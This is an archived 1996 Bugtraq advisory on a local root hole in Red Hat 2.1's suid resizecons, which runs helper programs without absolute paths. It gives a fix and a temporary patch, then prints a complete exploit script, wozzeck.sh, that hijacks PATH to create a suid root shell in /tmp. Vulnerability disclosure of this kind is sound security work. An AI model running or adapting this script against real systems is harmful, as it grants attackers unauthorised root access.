Home page logo
/

bugtraq logo Bugtraq mailing list archives

resizecons Red Hat 2.1 security hole
From: davem+ () andrew cmu edu (David J Meltzer)
Date: Fri, 2 Feb 1996 22:31:23 -0500


   There is a security hole in Red Hat 2.1, which installs the program
/usr/bin/resizecons suid root.  The resizecons program allows a user
to change the videmode of the console.  During this process, it runs
the program restoretextmode without an absolute pathname, assuming the
correct version will be found in the path, while running with root
privileges.  It then executes setfont in the same manner.  By setting
the path to find a rogue restoretextmode, a user can execute an arbitrary
program as root.
   As a more amusing aside, the file /tmp/selection.pid is read and the
pid contained within is sent a SIGWINCH, allowing a user on the system
to force a redraw of the screen to an arbitrary process (that handles
SIGWINCH calls) on the machine.
   If /usr/bin/resizecons needs to be run by users other than root at the
console, provisions need to be made in the code to execute the outside
utilities with absolute pathnames, and to check access rights on files
before opening.

                   Program: /usr/bin/resizecons
Affected Operating Systems: Red Hat 2.1 linux distribution
              Requirements: account on system
           Temporary Patch: chmod -s /usr/bin/resizecons
       Security Compromise: root
                    Author: Dave M. (davem () cmu edu)
                  Synopsis: resizecons runs restoretextmode without an
                            absolute pathname while executing as root,
                            allowing a user to substitute the real
                            program with arbitrary commands.

Exploit:

wozzeck.sh:
#!/bin/sh
#
# wozzeck.sh
# exploits a security hole in /usr/bin/resizecons
# to create a suid root shell in /tmp/wozz on a
# linux Red Hat 2.1 system.
#
# by Dave M. (davem () cmu edu)
#
echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
echo ================ Checking system vulnerability
if test -u /usr/bin/resizecons
then
echo ++++++++++++++++ System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/313x37
This exploit is dedicated to
Wozz.  Use it with care.
_EOF_
cat << _EOF_ > /tmp/restoretextmode
#!/bin/sh
/bin/cp /bin/sh /tmp/wozz
/bin/chmod 4777 /tmp/wozz
_EOF_
/bin/chmod +x /tmp/restoretextmode
PATH=/tmp
echo ================ Executing resizecons
/usr/bin/resizecons 313x37
/bin/rm /tmp/restoretextmode
/bin/rm /tmp/313x37
if test -u /tmp/wozz
then
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
else
echo ---------------- Exploit failed
fi
else
echo ---------------- This machine does not appear to be vulnerable.
fi




       /-------------\
       |David Meltzer|
       |davem () cmu edu|
 /--------------------------\
 |School of Computer Science|
 |Carnegie Mellon University|
 \--------------------------/



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]